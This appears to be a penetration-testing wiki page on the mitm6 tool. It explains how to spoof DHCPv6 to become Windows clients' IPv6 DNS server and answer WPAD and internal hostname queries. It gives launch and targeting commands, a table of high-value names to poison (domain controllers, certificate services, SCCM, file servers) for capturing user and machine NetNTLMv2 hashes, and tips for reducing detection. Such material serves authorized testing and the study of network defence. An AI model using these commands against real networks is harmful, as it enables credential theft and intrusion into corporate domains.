Skip to content

mitm6 (DHCPv6/DNS/WPAD)

Spoof DHCPv6 to become the client’s IPv6 DNS, then answer selected DNS queries (e.g., AAAA for internal hosts or wpad.<domain>) so the client connects to attacker-controlled IPv6 endpoints. This coerces both machine and user traffic to your host.

Quick start (usage)

Action Command
Launch with target domain mitm6 -d <domain.fqdn>
Specify interface mitm6 -i <iface> -d <domain.fqdn>
Ignore clients that don’t send DHCPv6 FQDN option mitm6 --ignore-nofqdn -d <domain.fqdn>

Targeted usage (minimize blast radius)

Mitm6 poisons DHCPv6 so affected Windows hosts add your box as their IPv6 DNS. Broad answers can degrade resolution. Keep impact low by allowlisting only the names and clients you need and staying silent on everything else so hosts fall back to existing resolvers.

Action Command
Answer only for WPAD anywhere mitm6 -d wpad
Answer only for specific hosts (exact FQDNs) mitm6 -d dc01.corp.local -d ca.corp.local
Exclude a sensitive hostname while answering for a domain pattern mitm6 -d corp.local -b payroll.corp.local
Target only two client machines (and only WPAD) mitm6 -hw WIN10-01.corp.local -hw SRV-WEB01.corp.local -d wpad --ignore-nofqdn
Reduce detection surface (no Router Advertisements) mitm6 -d <domain.fqdn> --no-ra

Note: mitm6 does not forward unmatched queries. It only answers names you allowlist and stays silent on the rest, so clients may briefly delay and then use other configured DNS.

Hosts to target

Target names that domain-joined machines and users already contact with automatic authentication. Keep the allowlist tight.

Host / Service Examples (names) Likely auth captured Why target
WPAD (proxy auto-discovery) wpad, wpad.<domain> User NetNTLMv2 (proxy auth) Broadest, fastest user coverage when auto-detect is enabled.
Domain controllers (as names clients resolve) dc01.<domain>, dc02.<domain> Machine$ NetNTLMv2 from many clients Endpoints constantly query DCs (LDAP/LDAPS/SYSVOL). You catch clients, not the DC itself.
AD CS / PKI web endpoints ca.<domain>, pki.<domain>, certsrv.<domain>, ocsp.<domain> User or Machine$ NetNTLMv2 Auto-enrollment and certificate services often use HTTP with IWA.
DFS / File servers dfs.<domain>, filesrv01.<domain> User or Machine$ NetNTLMv2 (SMB) Logon scripts, mapped drives, and UNC paths trigger SMB auth.
Management infra wsus.<domain>, mp01.<domain>, sccm.<domain> Machine$ NetNTLMv2 Agents poll regularly with integrated auth.
Intranet IWA sites intranet.<domain>, sharepoint.<domain> User NetNTLMv2 (HTTP) Browsers use integrated auth to internal sites.

Notes - DCs and many servers are often statically configured and may not accept DHCPv6 DNS; you’re aiming to catch clients talking to those names. - Start with wpad for user creds at scale, or allowlist a few high-value names plus a small set of client hosts to pursue specific Machine$ accounts.

What mitm6 is doing (mechanics)

  • Becomes the client’s IPv6 DNS: Responds to DHCPv6 so your host is set as the DNS server; Windows then sends you name queries.
  • Wins resolution via IPv6 preference: You craft answers (typically AAAA) for target names so clients connect to your IPv6 address instead of the real host.
  • Leverages WPAD via DNS (when enabled): Clients query wpad.<domain>; you answer to your host and serve a PAC that points traffic at you (proxy path).
  • Low persistence: Short DHCPv6/DNS lifetimes mean clients revert within minutes after you stop. To force immediate revert on Windows: ipconfig /renew6 then ipconfig /flushdns.

Notes / OPSEC

  • Controls that break it: DHCPv6 Guard, strict IPv6 DNS policy, or environments that don’t use DHCPv6 for DNS.
  • Windows-centric behavior: Windows commonly accepts DNS from DHCPv6; many non-Windows clients prefer other mechanisms (RA/RDNSS) and may be unaffected.
  • Same-segment requirement: Attacker needs L2 adjacency to answer DHCPv6.
  • Interface prep: Ensure the attacking NIC has a valid IPv6 link-local address.
  • Scope carefully: Keep allowlists tight; answer only for in-scope names and hosts.